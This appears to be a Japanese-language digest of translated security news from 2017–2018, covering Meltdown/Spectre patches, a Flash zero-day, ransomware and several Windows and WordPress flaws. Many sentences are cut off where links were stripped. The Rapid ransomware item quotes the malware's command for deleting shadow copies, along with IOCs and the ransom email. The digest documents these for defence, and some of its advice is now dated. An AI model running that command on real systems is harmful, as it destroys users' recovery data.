 あなたのWordPress Dashboard > Update を単純に訪問し、"Update Now"をクリックする。
 遅れるな。この操作を今日実行しなさい。そうすることで、これを忘れてしまい、将来窮地に陥るリスクが失くなる。
研究者が身代金要求型マルウェアを防御するWindowsのControlled Folder Accessをバイパスする方法を発見した  BleepingComputer : News>Security (2018/02/06) Bleeping Computerのレビューで 詳細に説明されているこの機能は、Windows 10の全てのバージョンに組み込まれているWindows Defenderアンチウィルスの一部である。
Controlled Folder Access(アプリケーション ホワイトリスト)
 しかし、SecurityByDefaultのスペインのセキュリティ研究者Yago Jesusは、Microsoftが、このリストに全てのOfficeアプリケーションを自動的にホワイトリストしていたことを発見した。これは、ユーザが好むと好まざるとに拘わらず、OfficeアプリケーションがCFAフォルダ中に配置されているファイルを改竄できることを意味している。
身代金要求型マルウェアはCFAをバイパスするためにOffice OLEオブジェクトを使用することができる 
 身代金要求型マルウェア開発者は、Officeファイルの内部にOLEオブジェクトを介してCFAをバイパスする簡単なスクリプトを追加することでMicrosoftのCFAアンチ身代金要求型マルウェア機能を簡単にバイパスすることができると、Jesusは発言している。研究 において、Jesusは、CFAフォルダの内部に格納された他のOfficeドキュメントのコンテンツを上書きし、この同じファイルをパスワードで保護したり、あるいは、CFAフォルダの外にあるファイル内部のコンテンツをコピー&ペーストし、それらを暗号化し、そのオリジナルを削除するために、ブービートラップされたOfficeドキュメント(スパムメールを介して受信される)を悪用した三つの例を挙げた。
JesusはMicrosoftに嫌気がさした 
 Jesusは、彼が発見した問題をMicrosoftに通知したと発言している。彼がMicrosoftから受け取ったeMailのスクリーンショットにおいて、Microsoftは、この問題をセキュリティ上の脆弱性と分類しておらず、報告されたバイパス方法を解決するために、今後のリリースでCFAを改善するだろうと発言したとしている。
Microsoftからのメールのスクリーンショット
AdobeがFlashの0-Dayを警告している。パッチのリリースは来週  Sophos : NakedSecurity (2018/02/02) APSA18-01 (【訳註】 APSA18-01に関するIPA情報処理推進機構のサイトはこちら ))で、Adobeは以下のように警告している。
 Adobeは、CVE-2018-4878に関する脆弱性攻撃がオンライン上に存在しており、それが、Windowsユーザに対する標的型攻撃として限定的に使用されているとするレポートに気が付いている。これらの攻撃は、eMailで配布された悪意あるFlashコンテンツが埋め込まれたOfficeドキュメントを悪用している。
 ここで専門用語を再考する:
・ CVE-2018-4878は、Flash中のセキュリティ バグや脆弱性を同定する代用語である。 
 良いニュースは、Adobeが、再来週の定例のパッチの火曜日(2018/02/13)まで待つのではなく、来週(2月5日から始まる週)パッチをリリースしようとしていることである。
何をすべきか? 
・ あなたがFlashを必要としていないのであれば、Flashをアンインストールしなさい 。我々がFlashに関して聞く最も一般的な「必要性」は、Webビデオを見ることであるが、殆どすべてのWebサイトは、あなたがFlashを持っていない場合に備えてビデオ用にHTML5を使用している。あなたがFlashをアンインストールしても、あなたのブラウザは、代わりに、組み込みのビデオプレーヤーを使用するので、おそらく、あなたは全くFlashを必要としないはずである。あなたがFlashを必要であると確信している場合を除いて、とにかくFlashをアンインストールしてみなさい 。重大な何かが機能停止した場合には、あなたはFlashを常に戻すことができる。できる限り早急にAdobeのアップデートを入手しインストールしなさい 。あなたが予防措置としてFlashをアンインストールした場合は、新しいバージョンが出現するまでFlashを再インストールしないようにしなさい。
 
 あなたのブラウザのFlashをOFFにするだけでは十分ではないことに注意しなさい。これはWebページに埋め込まれたFlashファイルをブラウザ中でレンダリングすることを妨げるが、あなたのコンピュータから完全にFlash Playerを削除しているわけではない。
LenovoのThinkPad Manager中のメジャー セキュリティフローは、ハッカーがあなたのラップトップにアクセスすることを可能にする  Bitdefender : Hot For Security (2018/01/31) 確認 している。
 脆弱性のあるモデルは以下である。
ThinkPad L560 
Microsoftは、Spectre Mitigationsを無効化するWindowsの定例外のアップデートをリリースした  BleepingComputer : News>Security (2018/01/28) KB4078130 )は、Windows 7 (SP1), Windows 8.1, Windows 10の全バージョンとサポートされる全てのWindows Serverディストリビューションをターゲットにしている。1月3日 にMeltdownとSpectre用の緩和策を出荷していた。
MicrosoftはIntelステートメントに反応した 
 Microsoftは、Intelがこのバグのために開発されたマイクロコード アップデートが「予期した以上の再起動と、データ損失と損壊を導く他の想定外のシステム挙動」を発生させると公に認めた 後、Spectre Variant 2 のバグ用の緩和策を無効化することに決定したと発言している。デスクトップ とサーバー ユーザに関して利用可能である。
Microsofだけがこのバグの問題を持っているわけではない 
 MicrosoftはSpectre Variantの二つのパッチを取り消した最初の企業ではない。Intelのアナウンスの後、Dell は、Spectreパッチを含んでいない「以前のBIOSバージョンに戻す」ように顧客にアドバイスしている。HP (ヒューレットパッカード)はまた、類似のステップを取っている。HPは、MeltdownとSpectre(Variant 1とVariant 2)のパッチを含むBIOSアップデートを利用可能にしていたが、今週MeltdownとSpectre Variant 1のパッチだけを含みVariant 2 は含まないBIOSアップデートを再発行した。Microsoftは、AMDプロセッサ用のWindowsアップデートの公開を休止 している。Microsoftは、報告されているBSODエラーを修正するためにAMDと共同作業した後に、これらのアップデートを再開 している。
Acronis: 身代金要求型マルウェア プロテクション。さあ、無料の身代金要求型マルウェア防御を手に入れよう  The Register : Security (2018/01/26) Active Protection テクノロジを搭載したフリーでスタンドアロン バージョンのAcronis Ransomware Protectionをリリースした。RanSim の身代金要求型マルウェア シミュレータを使用することができる。この件に関するAcronisのブログはこちら 。
追加のコメント 
 これは、Acronisによる気の利いたマーケティング戦略である。何らかの役に立つのであれば、無償のアンチ身代金要求型マルウェア ツールを好まないものがいるだろうか? 詳細に関してはこちら を参照しなさい。こちら 。登録は要求されない。
Rapid身代金要求型マルウェアはユーザが作成した新しいファイルを暗号化し続けている  BleepingComputer : News>Security (2018/01/23) ID-Ransomware の統計によると、統計上の最初発見は1月3日であり、これまでに300を超える登録になっている。この数は、多分全犠牲者の中の氷山の一角であり、十中八九この感染を特定するためのID-Ransomwareを活用していない多くの人々がいる。
ID-RansomwareへのRapid身代金要求型マルウェア提出数
Rapid身代金要求型マルウェアがコンピュータを暗号化する方法 
 この身代金要求型マルウェアが実行されると、この身代金要求型マルウェアは、シャドーボリュームコピーを除去し、データベース プロセスを終了し、自動修復を無効化する。この終了させられるプロセスは、sql.exe, sqlite.exe, oracle.comであり、実行されるコマンドは以下である。
vssadmin.exe Delete Shadow /All /Quiet
 これらのコマンドが実行されたら、この身代金要求型マルウェアは、暗号化するためのファイルに関してコンピュータをスキャンする。ファイルが暗号化されると、その暗号化されたファイル名に .rapid 拡張子を追加する。
暗号化されたフォルダ
 この身代金要求型マルウェアがコンピュータの暗号化を終了すると、Windowsデスクトップを含む様々なフォルダ中にHow Recovery Files.txtと名付けられた脅迫文を作成する。この脅迫文は、犠牲者が支払い指示を受け取るためにコンタクトしなければならないeMailを含んでいる。
Rapid身代金要求型マルウェアの脅迫文
 この感染はまた、この身代金要求型マルウェアがスタートアップで起動するautorunsを作成し、脅迫文を表示する。これらautorunsに関する情報は以下のIOCsで発見することができる。Rapid Ransomware Support & Helpトピック を立ち上げている。
Rapid身代金要求型マルウェアに感染した場合に、あなたが実行すること 
 Rapid身代金要求型マルウェアは、最初にコンピュータを暗号化した後も、実行を継続し、暗号化するための新しいファイルを監視し続けているので、可能な限り早急に、この身代金要求型マルウェアをシャットダウンすることは重要である。犠牲者がRapid身代金要求型マルウェアに感染させられたことを検出したら、即座にWindowsタスクマネージャを開き、この身代金要求型マルウェア関連プロセスを終了させなさい。
タスクマネージャ
 このプロセスを終了したら、msconfig.exeを起動し、このautorunsを無効にしなさい。あなたがWindowsタスクマネージャにアクセスできないのであれば、Safe Mode with Networking(セーフモードとネットワーク)でコンピュータを再起動し、そこからタスクマネージャにアクセスすることを試みなさい。
Rapid身代金要求型マルウェアから自分自身を保護するには 
 身代金要求型マルウェアから自分自身を保護するためには、適切なコンピュータ利用の習慣とセキュリティソフトウェアを使用することが重要である。真っ先に、あなたは、身代金要求型マルウェア攻撃のような緊急の場合に、復元可能な信頼性がありテスト済みのデータのバックアップを常に持っておかなければならない。Emsisoft Anti-Malware とMalwarebytes Anti-Malware は共に、殆どではないにしても、多くの身代金要求型マルウェア感染によるコンピュータの暗号化を防御できる挙動検出を含んでいる。
・ バックアップ、バックアップ、バックアップ!VirusTotal のようなツールで添付ファイルをスキャンしなさい 
 身代金要求型マルウェアを防御するための完全ガイドに関しては、我々のHow to Protect and Harden a Computer against Ransomware を参照しなさい。
IOCs 
ハッシュ 
125c2bcb0cd05512391a695f907669b2f55a8b69c9d4df2ce1b6c9c5a1395b61
Rapid身代金要求型マルウェア関連ファイル 
%AppData%\info.exe
Rapid身代金要求型マルウェア関連レジストリエントリ 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Encrypter"="%AppData%\info.exe"
Rapid身代金要求型マルウェアeMailアドレス 
frenkmoddy@tuta.io
 
Rapid身代金要求型マルウェア脅迫文 
Hello!
 
MeltdownとSpectreのパッチはインストールするな。Intelはシステム再起動を増加させるだろうと警告している  Fossbytes : Security (2018/01/23) 5年前のマシンの凡そ90% を修正するだろうと約束した。しかし、このパッチ自体は、ユーザのコンピュータに再起動の問題を残したままにすることで問題を増加させた。新しい投稿 でこの問題に取り組んでおり、彼らが何らかの解決策を見つけ出すまで、MeltdownとSpectreバグ用に現在利用可能になっているセキュリティパッチをインストールしないようにユーザにアドバイスしている。他の影響を受けるチップ に関してもセキュリティパッチを作業中である。MeltdownとSpectreパッチはIntel用には問題を発生しない。Ubuntu Linux用の修正 をリリースした時、似たようなことが発生した。
Microsoftは、あなたのアンチウィルスがレジストリキーを設定しない限り、もはやWindowsセキュリティアップデートは受け取ることができないと発言している  BleepingComputer : News>Security (2018/01/09) サポートページ 上に新たに大変重要な詳細を追加した。最先端のCPU
中の緊急のフロー を解決するためのMeltdownとSpectreパッチをインストールするWindowsアップデートの引き金になる。
レジストリキーは、ユーザが将来のアップデートに関して適格であるか否かを決定する 
 Microsoftの最新のポリシーの変更によると、このレジストリキーは、Windowsアップデートプロセスの永久的なチェックになっており、(【訳者追加】 このレジストキーが設定されていないのであれば)MeltdownとSpectreパッチだけでなく、将来の全てのアップデートを妨げるだろう。Mediumブログ ポスト でこれが発生した理由を説明している。
 アンチウィルス ベンダの一部は、システムコールを妨害するために使用するハイパーバイザー(【訳注】 コンピュータの仮想化技術のひとつである仮想機械(バーチャルマシン)を実現するための制御プログラム(Weblioより))を挿入することでKernel Patch Protection(カーネル・パッチ・プロテクション。【訳注】 Microsoft Windowsの64ビット版が持つ、カーネルへのパッチの適用を妨ぐ機構で、一般にはPatch Guard (パッチ・ガード)の名称で知られる(Wikipediaより))をバイパスするテクニックを使用し、メモリロケーション(Meltdownの修正で現在変化しているメモリロケーション)に関して憶測を立ていることに問題がある。率直に言うと、このテクニックの一部は、ルートキットで使用されているテクニックと類似のものである。事実、Kernel Patch Protectionは、ルートキットと戦うために10年前にMicrosoftによって導入された。一部のアンチウィルス ベンダが大変疑問の余地のあるテクニックを使用しているために、彼らは結局システムに‘blue screen of death’(言い換えるなら、再起動ループ)を発生させることになる。
 MeltdownとSpectre脆弱性は、最先端のプロセッサ設計中の基本的なフローを目立たせた。Microsoftが先週配備した 修正は、アンチウィルス ソフトが現在Windows OSと相互作用している方法に関して類似の影響を生成している。Beaumontによると 、アンチウィルス企業は、彼らの顧客の一部が他の企業のアンチウィルスソフトウェアと一緒に稼働していることを承知しているために、これが発生しているとしている。このために、彼らは、他のアンチウィルスがMeltdownとSpectreパッチ用にアップデートされていない間に、レジストリキーを設定することで偶然にBSODを発生させる事を望んでいない。
レジストリキーは、そのうちに問題を引き起こすかもしれない 
 Beaumontは、このレジストリキーを作成しているアンチウィルス製品、ユーザに手動でこのレジストリキーを作成するように要請しているアンチウィルス製品、未だアップデートしておらず、Windows MeltdownとSpectreパッチと現在非互換であるアンチウィルス・ソフトウェアを追跡し続けてきた 。
ユーザはアンチウィルスにもう少し時間を与えるべき 
 アンチウィルス製品やユーザがレジストリキーを設定するまで全てのWindowsセキュリティアップデートを停止することに関しては、Microsoftは基本的に2つのことを発言している。
Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”
 Bleeping Computerは、ユーザがダブルクリックすることで、そのPCにこのレジストリキーを作成する .reg ファイル を作成した。ユーザは、彼らのアンチウィルス ベンダが、このレジストリキーを手動でインストールするようにユーザに告げているのであれば、ユーザは、このファイルを使用することができる。WindowsコンピュータをMeltdownとSpectreパッチでアップデートする詳細情報は、ここで 得られる。
Microsoft WordのsubDoc機能は、Windows認証を盗むために悪用されている  BleepingComputer : News>Security (2018/01/05) 
subDoc攻撃の動作方法 
 Rhino Labsのエキスパートは、攻撃者は悪意あるサーバからサブドキュメントを読み込み、Wordファイルを組み立てることができると発言している。
subDocは、DDE、数式エディタ等に仲間入りした 
 この攻撃は、セキュリティ研究者Juan Diego やセイバーセキュリティ企業DefenceCode によって説明されているように、NTFSハッシュを渡してWindowsを欺くためにSCFファイルやSMBリクエストを使用するような他のテクニックに多少類似している。Dynamic Data Exchange 機能(DDE、【訳注】 動的データ交換。WindowsやOS/2環境下において、複数のアプリケーションソフトウェア間で通信を行う技術(Wikipediaより))や、古いOffice数式エディタ の使用を含んでいる。最近Word中のDDEサポートを無効化 した。subDocの運命は、この機能が通常のマルウエアの配布キャンペーンに役に立っていないことと、DDE攻撃されているMicrosoftが注目していないことから不明である。GitHubで利用可能 である、そして、現在Rhino Labsの一部門であり以前のLulzSecのメンバー、Hector "Sabu" Monsegur(【訳注】 ヘクター・ザビエル・モンセガー。アメリカ人のハッカー、通称「Sabu」。アノニマスAnonOpsグループ出身のハッカーで、アノニマスから分裂したLulzSec(ライズセック)のリーダーと目される(Wikipediaより))によって生み出された。Rhono Labsはまた、subDoc攻撃のステップ・バイ・ステップでの再現性付きの技術投稿 を公開した。
MeltdownとSpectre CPUフローに関してWindowsシステムをチェックしアップデートする方法  BleepingComputer : News>Security (2018/01/04) MeltdownとSpectre CPUフロー を解決する定例外のWindowsアップデート をした今日まで、我々は、これらのパッチをインストールする際の説明とサポートに関するノンストップの要請を受けてきた。
 これら全てのページでの最も主要で重要な声明は以下である。
 非互換のアンチウィルス アプリケーションによって発生するストップ・エラーを防止するために、Microsoftは、彼らのソフトウェアが、2018年01月のWindowsオペレーティング・システムのセキュリティアップデートと互換していることが確認されているメーカーのアンチウィルス ソフトを実行しているデバイスのためにだけ、Windowsセキュリティ アップデート(2018年01月03日にリリース)を提供している。
これは何を意味しているのか? 
 あなたのWindowsオペレーティング・システムのWindows Updateセクションに進み、「更新プログラムの確認」を押した時に、何かが現れた場合には、あなたは、それをインストールしても安全であることを意味している。ここで 利用可能である。あなたのオペレーティングシステムとハードウェア プラットフォームに応じて様々なKB番号が表示されるだろう。
アンチウィルス プログラムでの全体的混乱 
 Microsoftは、テストしている間に、MeltdownとSpectreパッチのインストレーション後、コンピュータのブートを妨げBSOD(死のブルースクリーン)を発生させるアンチウィルス プログラムを幾つか検出したと発言している。このGoogleドキュメントファイル は幾つかのアンチウィルス企業の対応リストを含んでいる。.reg ファイル である。
Key="HKEY_LOCAL_MACHINE" Subkey="SOFTWARE\Microsoft\Windows\CurrentVersion\QualityCompat" Value="cadca5fe-87d3-4b96-b7fb-a231484277cc" Type="REG_DWORD”
我々は、これを目立たせるために赤字で表示する。あなたのアンチウィルス ベンダがMeltdownとSpectreパッチと互換するAVベンダである事を確認した場合にのみ、この .reg ファイルを実行しなさい。 
パッチの状態をチェックする方法 
 Microsoftはまた、あなたのPCにこのアップデートが適切にインストールされているか否かをチェックする、あるいは、追加のファームウェアアップデートをあなたが必要としているか否かをチェックするために使用することのできる一連のPowerShellワンライナー(気の利いた寸評)をリリースしている。
 PowerShellを起動する時、必ず管理者権限で起動しなさい、そこで、要求されるモジュールをインストールすることができる。
 以下のPoserShellコマンドは、MeltdownとSpectreフローをテストするためのPoserShellモジュールをダウンロードしインストールする。
Install-Module SpeculationControl
 あなたが、このコマンドを実行し実行エラーを得た場合、あなたのPowerShell実行ポリシーを調整する必要があるかもしれない。以下のコマンドを実行しなさい。
Set-ExecutionPolicy Bypass
 これで、あなたのシステムを実際にチェックする二つ目のPowerShellコマンドを実行できる。
Get-SpeculationControlSettings
 Googleは、全てのCPUがMeltdownとSpectreフローに対する脆弱性があるわけではないが、その結果が、沢山の赤字で表示したように見えたなら、あなたのCPUとOSは、これらの攻撃に対して脆弱性がある。十中八九、このコマンドの結果は、以下のようになると、発言している。
パッチ前(画像をクリックすると拡大します)
 次のステップは、あなたがMeltdown/Spectreパッチを受け取るまで「更新プログラムの確認」ボタンを押すことである。上述の説明のように、これは、「問題のある」アンチウィルス ソフトウェアを使用している一部ユーザに関しては数日かかるかもしれない。
MeltdownとSpectreパッチに関するWindows Update(画像をクリックすると拡大します)
 このアップデートの後、もう一度 Get-SpeculationControlSettings コマンドを実行する必要がある。可能なシナリオが二つある。
パッチした後、更にファームウェアのアップデートが必要とされる(画像をクリックすると拡大します)
 この画像は、あなたのシステムがMeltdownバグ用のパッチを受け取ったが、Spectreバグに関しては不完全なパッチを受け取ったことを意味している。
 GoogleがSpectreは脆弱性攻撃することも難かしいがパッチすることも難かしいと昨日発言したように、これは予期されていたことである。
MeltdownとSpectreパッチが達成されている場合(画像をクリックすると拡大します)
 上図のように、出力が全て緑であり、各アイテムがTrueに設定されているなら、あなたは、これらの攻撃から保護されている。
MicrosoftがMeltdownとSpectre CPUフローの緊急アップデートをリリースした  BleepingComputer : News>Security (2018/01/04) 1995年以降にリリースされた殆どすべてのCPUに影響を与える と言われている二つのセキュリティフロー)を解決する定例外のアップデートをリリースした。Microsoftのセキュリティアドバイザリ (リンクは日本語サイトに変更しています)によると、これらはMeltdownとSpectreフローを解決する様々なWindowsディストリビューション用のWindowsセキュリティ アップデートである。
【訳注】 以下の表中のリンクはMicrosoftの日本語サイトに変更していますが、現時点(2018/01/04 22:20)で英文のままです。
  
    オペレーティング・システムのバージョン アップデート KB  
  
    Windows Server, version 1709 (Server Core Installation) 
    4656892    
  
    Windows Server 2016 
    4056890    
  
    Windows Server 2012 R2 
    4056898    
  
    Windows Server 2012 
    適用外 
     
  
    Windows Server 2008 R2 
    4056897  
   
    Windows Server 2008 
    適用外 
      
 
 このMicrosoftアップデートは全面的な修正ではない。Windows PCの一部は、Spectre攻撃を緩和するための追加のCPUファームウェア アップデートを要求するかもしれないが、このMicrosoftアップデートは、Meltdownフローを完全に解決すると思われる。
アンチウィルスソフトの一部での問題は、BSOD(死のブルースクリーン)に導くかもしれない 
 しかし、Microsoftはまた、MeltdownとSpectreセキュリティフィックスが、アンチウィルス製品の一部とは互換しないと警告している。互換ノート で発言している。ここで 完全なリストを発見することができる。
数百のサイトが、バックドア化されたWordPressプラグインを3年経っても使っている  BleepingComputer : News>Security (2017/12/26) 2016年10月下旬 、White Fir Designのセキュリティ研究者達は、攻撃者にWordPressサイト上でリモートコードの実行を可能にする14のプラグイン内部の奇妙なコードの存在について公に警告した。
悪意あるプラグインは2014年にWordPressサイトから削除された 
 White Firは、この14のプラグインと、同じ悪意あるコードを発見したThomas Hambach(香港に居住するWeb開発者)の2014年のブログポスト を関連付けた。悪意あるコードにアクセスしようとしている 様々なIPアドレスからのリクエストを検出し続けていた
数百のWordPressサイトはバックドア化されたプラグインを使用し続けていた 
 これらの過去の攻撃は、最近になって再び脚光を浴びた。WordPressプラグイン・ディレクトリは、ダウンロード オプションが無効にされていたとはいえ、閉じられた古いプラグインのページは可視のまま存在するように変更されていた。いままで、これらのページは公にはアクセスできなかった。
バックドア化されたコードを特徴にしていた14のプラグインの一つ
 
 これらのプラグインを使用しているサイトの全てが、何を探すべきかを認識しているあらゆるハッカーによってハッキングされる可能性がある。これらのサイトは十中八九見捨てられ、長く忘れられたプロジェクトである。これはWeb最大の問題の一つであり、"Website rot"(【訳注】 ROTは、Redundant(冗長), Outdated(期限切れ), Trivial(些末)コンテンツの頭文字(TechRepublicより))としても知られる。
WordPressは意のままに使えるオプションを制限した 
 マルウェアの配布などに乱用される可能性のある簡単にハッキングできるサイトからユーザを保護するために、一部の専門家は、セキュリティ上の理由から、プラグインが公式のWordPressプラグイン・ディレクトリから削除された時に、WordPressチームがサイトの所有者に警告することを提案している。発言している 。30万を超えるサイトに影響を与えた 他のバックドア化されたWordPressプラグインのケースを公開したので、WordPressチームは、別の道を選択したように見える。
Huawei(ファーウェイ)のルータ脆弱性は、Miraiの変種を拡散するために使用されている  Kaspersky : ThreatPost (2017/12/22) CVE-2017-17215 )を警告するために顧客に対してアップデートされたセキュリティ通知 を発行した。このフローは、脆弱性のあるルータ上でリモートコードを実行するために、ポート37215に悪意あるパケットを送信することをリモートの敵に可能にすると顧客に告げている。DNSプロバイダDyn とKrebs on SecurtiyのWebサイト を巨大なDDoS攻撃のターゲットにしたことで、2016年10月にトップニュースになった。オリジナルのMiraiマルウェアは、CCTVとDVRハードウェア中に発見されたDefaultのTelnet認証を使用することを可能にするフローを悪用した。
 「こんにちは、私はMiraiボットネットをコンパイルするために私を助けてくれる人を探しています。私は、あなたが実行しなければならない全てのことは、それをコンパイルし、1 テラビット/秒のアクセスができることであると聞かされた。どうかMirai telnetボットネットをセットアップするために私を助けてください。」
 OkikuもしくはSatoriの攻撃は、今迄のMiraiの変種とは異なり、telnetベースのブルートフォース攻撃には依存していない。代わりに、この新しい変種は、ファーウェイHG532デバイス中の今迄未知のCVE-2017-17215脆弱性を悪用するためにポート37215への攻撃を実行している。
Windows 10 Hello顔認識は写真で誤魔化すことが可能  The Register : Security (2017/12/20) Full Disclosure でドイツの侵入テストチームSyssによってアナウンスされた。
https://youtu.be/Qq8WqLxSkGs https://youtu.be/GVKKcoOZHwk https://youtu.be/cayqU3WCOso 
Windows 10パスワードマネージャは、ハッカーにデータを盗むことを可能にしている  Bitdefender : Blog (2017/12/18) chromium.org (ChromeブラウザとChrome OSの背後のオープンソース・プロジェクトに特化されたフォーラム)上でこの脆弱性の説明を提供している。記述している 。ダウンロードページ を訪問しバージョン 11.4.4(もしくは最新版)を手動でダウンロードしインストールする必要がある。
Synapticキーロガーが存在するHP(ヒューレットパッカード)のラップトップであるか否かをチェックし、そのキーロガーを削除する方法  BleepingComputer : News>Security (2017/12/11) HPのラップトップが、どのようにしてSynapticキーボードドライバの特定のバージョン中にキーロガー(実際には、デバッグトレース)を持つことになったか をカバーした。このキーストロークを記録するドライバーの能力をDefaultで無効にしても、依然として、HPラップトップの全てのユーザが修正しなければならない深刻なセキュリティリスクがある。
SynTP.sysのプロパティ
 この製品バージョン(上図のProduct version)が、19.3.11.37 16Aug16 としてリストされている場合、このキーロガー(もしくは、デバッグトレース)機能を含むドライバーをインストールされている。HPのサポートページにリストされている (リンクは日本語サイトに変更しています)あなたのラップトップで利用可能な最新のドライバを即座にダウンロードしなさい。あなたが、影響を受けるバージョンをインストールされていない場合であっても、この問題は、他のバージョンにも同様に影響を与える可能性があるので、あなたのラップトップ用の最新のドライバがリストされている場合には、私はアップデートをインストールするよう提案する。このバグを報告 した2017年11月初めにリリースされているので、既にインストールされているかもしれない。
Windows 7 アップデートは80248015エラーを与える。その理由と修正方法  FossBytes : News (2017/12/08) 明らかにした(PDF) 。セキュリティアドバイザリ でこの脆弱性について話し、それらを修正するパッチもリリースしている。しかし、これらのパッチを時宜にかなって推し進める責任を持っているのは各メーカーである。塞ぐ気がある PCメーカーが幾つか存在している。
Windows 7 アップデートは80248015エラーを与える。その理由と修正方法  BleepingComputer : News>Security (2017/12/04) 我々のフォーラム 、Microsfotフォーラム、他のサイトでも報告されており、全てのWindows 7ユーザに影響を与えている問題のようである。Ghacks によって収集された情報によると、このエラーは、Windows Updateによって使用されたファイル(誤って2017年12月3日を期限に設定されている)によって発生している。このファイルは有効期限切れなので、ユーザがWindows Updateを実行すると、これは、自動的に以下の何方かのエラーで失敗する。
・ Windowsは新しいアップデートを確認できません。このコンピュータで利用できる新しいアップデートを確認中にエラーが発生しました。エラー: コード 80248015 Windows Updateで不明なエラーが発生しました。
 私のWindows 7のPCで実行したWindows Updateのテストでのこのエラーの例を以下に示す。
Windows 7 Update 80248015エラー
 あなたが掘り下げたいのであれば、Windows Event Logsで類似の情報と共に複数のエラーを発見するだろうが、詳細とは言い難い。
エラー80248015に関するWindows 7 エラーログ
 残念なことに、あなたのコンピュータの再起動やWindows Updateトラブルシューティングツール を使用しても、この問題は修正されない。Microsoft Answersフォーラム のスレッドでArgHereBeDragons と名乗るユーザによると、このエラーはC:\Windows\SoftwareDistribution\AuthCabs\authcab.cabファイルで発生しているようである。このCABファイルは、2017/12/03 11:59:25(日本時間 2017/12/04 04:59:25)を期限とするauthorization.xmlと呼ばれるXMLファイルを含んでいる。ユーザが、この期限時刻の後にWindowsをアップデートしようとすると、Windows Updateは、このファイルの期限を原因として失敗する。
期限切れのファイル
 残念ながら、これらのファイルはMicrosoftによってデジタル署名されているので、このXMLファイルを編集することや、期限の日付を延長することは不可能であり、このファイルへのあらゆる変更は、このファイルをWindows Updateで使用されないようにしてしまうだろう。
署名されているauthcab.cabファイル
 この問題を修正するには、あなたのコンピュータの時計を2017年12月02日に戻し、もう一度Windows Updateを実行しなさい。私の場合は、これでWindows Updateをダウンロードしインストールすることができた。
2017/12/04 Update 
 あなたが、Windows Update設定変更画面で「Windowsの更新時にMicrosoft製品の更新プログラムを入手し、新しいオプションのMicrosoftソフトウェアについて確認する」をOFFにした場合に、この問題を修正するかもしれない動作する可能性のある他の修正が、テクノロジサイトBorn Cityによって発見されている (【訳注】 2017/12/05 13:04時点で、このリンクはアクセスできない状態です)。
この設定をOFFにする
 これは単なる応急措置である。最終的には、我々は、Windows 7ユーザがauthcab.cabファイルをダウンロードしアップデートするためのMicrosoftの緊急の修正のリリースを待つ必要がある。
Acer, Dell, Fujitsu, HP, Lenovo, Panasonicは、Intel MEセキュリティバグの影響を受ける  BleepingComputer : News>Security (2017/11/23) 詳細を公開した 。8つのバグは、Intel Management Engine (ME), Intel Server Platform Services (SPS), Intel Trusted Execution Engine (TXE)のようなIntel CPUコア・テクノロジに影響を与える。
6th, 7th & 8th Generation Intel Core Processor Family
 以下のファームウェア・バージョンを使用している製品だけが影響を受ける。
ME firmware versions 11.0/11.5/11.6/11.7/11.10/11.20
 多くのPCとNotebook企業は、彼らが世界中のユーザーに販売したサーバ、デスクトップ、ノートブック モデルに脆弱性のあるファームウェア・バージョンを実行しているCPUを組み込んでいた。
900を超えるPCとLaptopモデルが影響を受ける 
 週が進むにつれて、新しい情報が明るみに出てきた。以下のベンダーは、脆弱性のあるファームウェアを実行しているIntel製品が使われている製品のリストを公開した。
 
 全てのベンダがパッチをリリースしているわけではない、そして、ユーザは、利用可能になったら、彼らのデバイス用のファームウェアアップデートをダウンロードするために、これらのページを訪問するようにしなさい。WindowsとLinux用のツール をリリースしている。Windowsに関しては、ユーザはスキャン結果を閲覧するために、Intel-SA-00086-GUI.exeファイルを実行しなさい(以下の画像参照)。
Intel検出ツール
 サイバーセキュリティ企業Rapid7も、これらのフローのリスクを強調するために、企業顧客用の警告を発光している。Rapid7によると、これは専門家が以下のことを実行するために使用される。
・ ME/SPS/TXEに成りすます、それ故、ローカル・セキュリティ機能の証明正当性に影響を与える
LibXLライブラリ中の複数の脆弱性はRCE攻撃に対してドアを開いている  Kaspersky : ThreatPost (2017/11/17) 今週このフローを公開した Cisco Talosの研究者によると、攻撃者は夫々の脆弱性を悪用でき、特別に細工されたXLSファイルを使用して、リモートコード実行(RCE)攻撃を実行することができる。CVE-2017-2896 )は、フィッシングキャンペーンを介して悪意あるXLSファイルを送信することを敵対者に可能にし、開かれると、リモートコード実行中の結果としてターゲットのシステムでメモリ損壊の引き金を引くだろう。CVE-2017-2897 )は、libxls 1.4のread_MSAT関数中に存在していると、研究者は発言している。CVE-2017-12110 に関しては、このフローは、LibXL 1.4のxls_appendSST関数中に存在する悪用可能なInteger(単整数型)オーバーフロー脆弱性に結び付けられると、研究者は発言している。Integerオーバーフローは、計算処理が、それを格納するInteger型の最大サイズを超える値を生成する時に生じる条件であると説明される。CVE-2017-2919 )、二つのIntegerオーバーフロー(CVE-2017-12108  と CVE-2017-12109 )、そして、境界外書き込み(CVE-2017-12111 )のバグである。LibXL SVNリポジトリ を介してのみ利用可能である。
アンチウィルス・エンジン設計フローは、システムに噛みつかれる手助けをする  BleepingComputer : News>Security (2017/11/10) 
画像をクリックすると拡大します。
 幾つかのアンチウィルス製品は、今迄に検出されたマルウェアをユーザのオペレーティングシステムの重要な部分に送り出す「隔離から復元」機能の悪用をマルウェアやローカルの攻撃者に可能にする設計フローの影響を受け、マルウェアが昇格した特権でブート永続性を取得することを手助けする。
一部のアンチウィルス企業は、アップデートをリリースしている 
 Bognerは、彼がテストし脆弱性を発見した全てのアンチウィルスメーカーに通知したと発言している。本日、この研究者は、一部の企業がアップデートをリリースした後、彼の発見を公開 した。
AVGaterはどのように動作するのか 
 このフローがどのように動作するのかをより良く理解するために、脆弱性攻撃が成功するシナリオを簡単に解説する。
Step 1 - ユーザがマルウェアで感染させられる。
Step 2 - AVエンジンがマルウェアを検出する。
Step 3 - AVエンジンがマルウェアを隔離室に移動する。
Step 4 - 非管理者権限のローカル攻撃者が、影響を受けるシステム上で脆弱性悪用プログラムを実行する。これは、隔離されているサンプルの本来のファイルの位置を操作するために、NTFSディレクトリ・ジャンクションを使用する。
Step 5 - 攻撃者は、「隔離からの復元」操作を開始する。。
